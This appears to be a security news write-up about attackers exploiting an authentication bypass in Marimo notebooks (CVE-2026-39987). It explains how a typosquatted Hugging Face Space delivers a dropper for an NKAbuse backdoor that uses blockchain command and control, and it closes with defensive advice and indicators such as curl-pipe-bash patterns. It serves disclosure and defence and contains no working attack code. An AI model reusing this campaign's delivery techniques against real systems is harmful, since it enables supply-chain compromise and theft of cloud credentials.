Weaponized CVE-2026-39987 Pushes Blockchain Backdoor Through Hugging Face

Marimo notebooks have become a staple for data scientists, offering an interactive environment that often runs with elevated privileges and direct access to cloud credentials. The newly disclosed CVE‑2026‑39987 bypasses authentication, allowing attackers to execute arbitrary commands on any exposed instance. The speed of exploitation—under ten hours after the advisory—demonstrates how quickly threat actors can weaponize fresh vulnerabilities, especially when the affected software is widely adopted in fast‑moving AI development pipelines.

The campaign’s novelty lies in its use of Hugging Face Spaces as a distribution hub. By registering a typosquatted space named vsccode‑modetx, the attackers leveraged the platform’s reputable reputation to host a dropper script that fetches a UPX‑packed Go binary, kagent. This binary belongs to the NKAbuse family, which communicates via the NKN blockchain, providing a decentralized, hard‑to‑block command‑and‑control channel. Such supply‑chain abuse mirrors earlier Android RAT incidents, but now targets the burgeoning AI/ML developer ecosystem, where code execution can translate directly into cloud‑native compromise.

Defenders must adopt a multi‑layered approach. Immediate remediation includes patching Marimo instances and enforcing strict authentication for notebook access. Network segmentation can limit lateral movement to backend services like PostgreSQL and Redis. Organizations should also monitor for anomalous curl‑pipe‑bash patterns, hidden kagent directories, and outbound NKN traffic. Treating repositories on Hugging Face, GitHub, and PyPI as untrusted by default—combined with content inspection and allow‑listing—will mitigate future supply‑chain threats and protect critical AI workloads.